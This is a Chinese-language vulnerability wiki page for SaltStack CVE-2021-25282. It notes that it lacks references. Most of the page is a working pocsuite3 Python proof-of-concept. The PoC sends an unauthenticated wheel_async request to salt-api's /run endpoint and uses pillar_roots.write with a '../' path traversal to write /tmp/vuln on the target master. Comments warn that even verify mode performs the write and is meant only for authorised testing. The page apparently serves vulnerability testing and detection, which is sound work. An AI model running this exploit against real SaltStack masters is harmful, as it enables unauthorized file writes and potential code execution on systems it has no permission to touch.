
SaltStack 任意文件寫入漏洞(CVE-2021-25282)

注意：這個頁面的內容缺少參考資料，無法保證內容的準確性。


POC

注意：此 PoC 即使在 verify 模式下也不是被動探測——它會以 `client: wheel_async`、`eauth: auto` 且不附帶任何憑證的方式呼叫 salt-api 的 `/run`，嘗試透過 `pillar_roots.write` 以 `../` 路徑穿越在目標 master 上寫入 `/tmp/vuln`。回應中出現 `salt/wheel/<jid>` 標籤只代表任務已被接受，並不證明檔案確實已寫入（任務為非同步，結果未被查詢）。請僅在獲得授權的測試環境中執行。

#!/usr/bin/env python
# coding: utf-8
from urllib.parse import urlparse
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE    
import re
import json


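class TestPOC(POCBase):
    """pocsuite3 PoC for CVE-2021-25282: SaltStack ``pillar_roots.write`` path traversal.

    The probe sends one ``wheel_async`` job to the salt-api ``/run`` endpoint
    with ``eauth: auto`` and no username/password, asking ``pillar_roots.write``
    to store a marker string under a ``../``-prefixed path that escapes the
    pillar root (see ``desc``: on affected builds the wheel client is reachable
    through salt-api without valid credentials).

    What "success" means here: the JSON reply carries a ``salt/wheel/<jid>``
    event tag, i.e. salt-api accepted the job. The job is asynchronous and its
    result is never fetched, so a success does NOT prove the file was written.

    Operator note: even ``verify`` is an active test -- on a vulnerable master
    it attempts to create ``/tmp/vuln``. Only run it against hosts you are
    authorised to test.
    """
    vulID = '000'
    version = '1'
    author = 'zhzyker'
    vulDate = '2021-02-27'
    createDate = '2021-03-02'
    updateDate = '2021-03-02'
    references = ['https://github.com/zhzyker/vulmap']
    name = 'SaltStack Arbitrary file writing vulnerability(CVE-2021-25282)'
    appName = 'SaltStack'
    appVersion = '< 3002.5'
    vulType = VUL_TYPE.CODE_EXECUTION
    category = POC_CATEGORY.EXPLOITS.REMOTE
    desc = '''
        Unauthorized access to wheel_async, arbitrary code/commands can be executed through salt-api.
    '''

    # salt-api's default listen port; used when the target URL names none.
    _DEFAULT_PORT = 8000
    # Per-request timeout in seconds.
    _TIMEOUT = 10
    # Relative path handed to pillar_roots.write. The leading ``../`` segments
    # are meant to climb from the pillar root up to ``/`` (surplus ``..`` above
    # ``/`` is harmless on POSIX), so the write lands at /tmp/vuln.
    _TRAVERSAL_PATH = "../../../../../../../../../tmp/vuln"
    # File content written by the probe; a recognisable marker, nothing more.
    _MARKER = 'vuln_cve_2021_25282'
    _USER_AGENT = ('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 '
                   '(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36')

    def _build_request(self):
        """Return ``(headers, body)`` for the salt-api ``/run`` call.

        ``eauth: auto`` with no credentials is the point of the probe: a patched
        salt-api rejects the wheel job, an affected one schedules it.
        """
        headers = {
            'User-Agent': self._USER_AGENT,
            'Content-Type': 'application/json',
        }
        payload = {
            'eauth': 'auto',
            'client': 'wheel_async',
            'fun': 'pillar_roots.write',
            'data': self._MARKER,
            'path': self._TRAVERSAL_PATH,
        }
        return headers, json.dumps(payload)

    @staticmethod
    def _wheel_event(text):
        """Extract ``(tag, jid)`` from a salt-api ``/run`` JSON reply.

        Mirrors the original lookup: ``return`` is iterated with ``list()`` so a
        list of dicts yields its first element (a dict keyed ``tag``/``jid``).
        Raises ValueError (bad JSON), KeyError, IndexError or TypeError when the
        body does not have that shape; the caller treats all of them as
        "no evidence on this port".
        """
        first = list(json.loads(text)["return"])[0]
        tag, jid = first["tag"], first["jid"]
        # Non-string tag/jid cannot satisfy the substring checks in _verify;
        # surface that as the same exception class the checks would raise.
        if not isinstance(tag, str) or not isinstance(jid, str):
            raise TypeError('tag and jid must be strings')
        return tag, jid

    def _verify(self):
        """Probe the target's salt-api and report whether the wheel job was accepted.

        Uses the port from ``self.url`` when present, otherwise 8000. Returns the
        Output built by :meth:`parse_output`: success carries ``VerifyInfo`` with
        the URL hit, the returned JID and the traversal path sent as ``UPLOAD``.
        """
        result = {}
        parsed = urlparse(self.url)
        # A bare host:port target has no scheme; '://' alone would be an invalid
        # URL, so fall back to plain http rather than fail silently.
        scheme = parsed.scheme or 'http'
        ports = [parsed.port] if parsed.port else [self._DEFAULT_PORT]
        headers, body = self._build_request()
        for port in ports:
            url = '{}://{}:{}/run'.format(scheme, parsed.hostname, port)
            try:
                # verify=False: salt-api commonly runs with a self-signed
                # certificate; this only relaxes TLS checks on our side.
                resp = req.post(url, headers=headers, data=body,
                                timeout=self._TIMEOUT, verify=False)
                tag, jid = self._wheel_event(resp.text)
            except (req.RequestException, ValueError, KeyError,
                    IndexError, TypeError):
                # Closed port, non-JSON reply or an unexpected document shape:
                # none of these is evidence either way, so try the next port.
                continue
            # An accepted wheel job is echoed back as a 'salt/wheel/<jid>' tag.
            if "salt/wheel" in tag and jid in tag:
                result['VerifyInfo'] = {
                    'URL': url,
                    'JID': jid,
                    'UPLOAD': self._TRAVERSAL_PATH,
                }
                break
        return self.parse_output(result)

    def _attack(self):
        """Same as :meth:`_verify`: the verify probe itself performs the write."""
        return self._verify()

    def parse_output(self, result):
        """Wrap *result* in a pocsuite3 Output: success when non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output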

# Hand the PoC class to pocsuite3's registry so the framework can discover and run it.
register_poc(TestPOC)

版權信息

POC由【之乎者也】提供。